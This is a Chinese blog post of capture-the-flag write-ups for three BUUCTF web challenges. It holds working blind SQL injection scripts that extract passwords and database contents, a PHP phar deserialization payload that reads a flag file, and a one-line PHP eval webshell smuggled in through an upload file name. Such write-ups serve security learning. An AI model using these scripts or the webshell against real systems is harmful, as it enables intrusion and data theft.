BUU刷题-web

最新推荐文章于 2023-01-02 16:17:25 发布
最新推荐文章于 2023-01-02 16:17:25 发布
阅读量316 收藏 3
点赞数 4
分类专栏: web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46540840/article/details/120122012
版权

[NCTF2019]SQLi

访问robots.txt

发现hint

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

发现过滤了 太多东西 单引号都给过滤了 ,

不过这里可以用\来闭合’看了看php版本[外链图片
在这里插入图片描述

可以用%00截断,那末思路就有了

先尝试一波正确回显

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m3ewqpGL-1630849410817)(C:\Users\ASUS\Desktop\QQ截图20210905100227.png)]

看到回显welcome,那末可以利用这个来判断 bool类型

regexp 字符串匹配支持正则

脚本为主要语句为

 data = {
            'username': '\\',
            'passwd': "||/**/passwd/**/regexp/**/\"^{}\";{}".format((password+j),parse.unquote('%00'))
        }

脚本为

import  requests
import  string
from urllib import parse
string= string.ascii_lowercase + string.digits + '_'
url= 'http://0c034adc-a4d9-4fe6-98f2-5ca68f2effe9.node4.buuoj.cn:81/index.php'
password=''

for i in range(50):
    for j in string:
        data = {
            'username': '\\',
            'passwd': "||/**/passwd/**/regexp/**/\"^{}\";{}".format((password+j),parse.unquote('%00'))
        }
        res= requests.post(url=url,data=data)
        if('welcome' in res.text):
            password+=j
            print(password)
            break

在这里插入图片描述

然后 提交密码 得到flag

在这里插入图片描述

看了看大佬wp 发现如果这里""被过滤的情况下可以用 16进制来绕过

[CISCN2019 华北赛区 Day1 Web1]Dropbox

首先随便注册一个号进去

上传一个文件后 发现有下载功能 ->任意文件下载

bp抓一下包

在这里插入图片描述

发现有戏

尝试一下 index.php显示文件不存在 那末路径换一下试试 最终…/…/index.php 文件存在

index.php

<?php
include "class.php";

$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>

class.php

<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">åˆ é™¤</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

delete.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

找到

    public function close() {
        return file_get_contents($this->filename);
    }

可以控制 那末尝试构造调用此方法

$a= new User();
$a->db= new File();
$a->db->filename= '/flag.txt'

可是这样构造没有回显 ,那采取间接方法.

那么我们就让$this->db = new FileList(),让它去调用close,然后调用__call(),然后调用

__call()方法在调用 _destruct函数,打印结果

构造如下

<?php


class User {
    public $db;
}

class FileList
{
    private $files;
    private $results;
    private $funcs;
    public function __construct()
    {
        $this->files = array(new File());
        $this->results = array();
        $this->funcs = array();
    }

}

class File
{
    public $filename = '/flag.txt';
}
$a= new User();
$a->db= new FileList();
$phar = new Phar("myphar.phar"); //后缀名必须为phar

$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

在这里插入图片描述

[CISCN2019 总决赛 Day2 Web1]Easyweb

老套路 查看源代码 ,和访问robots.txt

源代码 发现类似注入点的地方

在这里插入图片描述

User-agent: *
Disallow: *.php.bak

看师傅的wp 是访问

image.php.bak

得到源码

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

那就尝试一下注入

输入\0 时会被addslashes()函数转成 \ \0 进而将\0过滤留下 \从而可以转移’ 达到绕过目的

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FNYZTkoL-1630849410825)(C:\Users\ASUS\Desktop\QQ截图20210905205311.png)]

可以利用

# payload= 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url+payload)
# print(requests.get(url+payload).text)

得出回显的内容有JFIF

尝试爆出数据库

import requests

#username=123&password=Password


url ='http://d80bf902-c46b-46a9-82d1-c6da6e8bfb01.node4.buuoj.cn:81/image.php?id=\\0&path='

#JFIF
# payload= 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url+payload)
# print(requests.get(url+payload).text)
#
#
result = ''
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'or ascii(substr(database()/**/from/**/{i}/**/for/**/1))>{mid}%23'
        r = requests.get(url + payload)
        if "JFIF" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

数据库为

ciscnfinal

爆出表名

payload = f'or ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))/**/from/**/{i}/**/for/**/1))>{mid}%23'

在这里插入图片描述

得到表名

那么直接爆出 password

payload = f'or ascii(substr((select/**/(password)from(users))/**/from/**/{i}/**/for/**/1))>{mid}%23'

在这里插入图片描述

得到密码
在这里插入图片描述

一个文件上传,那就传呗

在这里插入图片描述

随便传个访问为

在这里插入图片描述

发现文件名 在日志中

那么这里不能传 php 应该时过滤了php 那末利用短标签绕过

文件名

<?= @eval($_POST['shell']);?>

利用蚁剑连接 得到flag

请添加图片描述

Rgylin
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUWeb刷题记录
dangejinghong的博客
04-23 640
但是,如果要接着直接查这个flag就会出现问题了,select等关键词被过滤了,所以我们只能另辟蹊径,根据从网上大佬的wp学习,可以将。file=phar://压缩包/内部文件 phar://xxx.png/shell.php (zip要用#隔开,这个用/)file=php://filter/read=convert.base64-encode/resource=xxxx.php。发现他将空格过滤了,不过通过网上学习,发现可以用一些字符绕过空格,例如。
BUUCTF刷题笔记2
m0_74245809的博客
04-24 110
11
buu刷题记录
Luiino的博客
01-02 365
分析:整体观察一下,发现是CBC模式下的AES。key是32字节(256bits),iv是16字节(128bits),所以两者异或的结果其实是key的低128bits与iv异或,再加上key的高128bits。即输出结果的高128bits就是key的高128bits,从而能得到key。得到了key之后,取低128bits再与输出结果的低128bits进行异或得到iv。
Python3 String模块ascii_letters和digits
Great Expectations的博客
11-06 1988
本文介绍Python3中String模块ascii_letters和digits方法,其中ascii_letters是生成所有字母,从a-z和A-Z,digits是生成所有数字0-9. import random, string str_ascii = [random.choice(string.ascii_letters + string.digits) for x in range(7)...
python 笔记 之 string 模块
weixin_34247299的博客
04-26 73
2019独角兽企业重金招聘Python工程师标准>>> ...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 4万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
python string.ascii_lowercase和string.lowercase区别
机器学习初学者必看,关注我,一起了解机器学习
02-24 5259
首先问题来源于: 希望创建一个随机的25位的小写字母和数字的组合字符串 import random import string ''.join(random.sample(string.ascii_lowercase + string.digits, 25)) 用ipython 自动补全发现还有一个string.lowercase 很是好奇有什么不同。 机智呀,原来一样的还很多。 官方文档和...
Python3基础:String模块ascii_letters和digits
killmice的专栏
11-10 3万+
Python3基础:String模块ascii_letters和digits (其实不止是python3 可以, python2.7 也可以) 本文介绍Python3中String模块ascii_letters和digits方法,其中ascii_letters是生成所有字母,从a-z和A-Z,digits是生成所有数字0-9. 示例如下: Python
BUUCTF刷题Web解题方法总结(一)
Y1seco的博客
03-28 5103
文章目录1.堆叠注入,原理2.SQL缺省代码审计SQL注入 1.堆叠注入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FRO
BUUCTF刷题记录
bmth666的博客
03-15 2318
文章目录web[强网杯 2019]随便注[护网杯 2018]easy_tornado web [强网杯 2019]随便注 注意表的两端两边要加:`` 1' ; show databases;#查看数据库 1' ;show tables;#查看表 0'; show columns from words ;#查看words表中字段 0';show columns from 19198109311...
BUU刷题记录-2020.11.7
Georgeiweb的博客
11-08 820
RSA 题目:给了两个文件,一个pub.key,另一个为flag.enc 解题思路:先把pub.key文件改为txt文件,然后就可以打开,内容是rsa的公钥, 所以直接使用在线工具解出e,n 公钥解析 然后在有n=p*q再用在线工具 factordb ...
[NCTF2019]SQLi
fmyyy1的博客
04-13 128
学到了新的sql注入知识。 场景 看到了查询语句。 访问robots.txt 看到有hint 看到了黑名单。 $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|slee
8-7日刷题
Realiy的博客
08-08 364
[ciscn2019 华北赛区 day1 web2]ikun 知识点:逻辑漏洞,jwt,python反序列化 这题本来是在buuctf做的,后来buuctf维护,然后就在攻防世界做了 打开题目看到一定要买到lv6,随手翻页,看到如图,那么要找到lv6.png,写个脚本来找快一点。 import requests as res url='http://8110e838-75a9-4a2f-8b80-38b3680ba32c.node3.buuoj.cn/shop?page=' for i
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值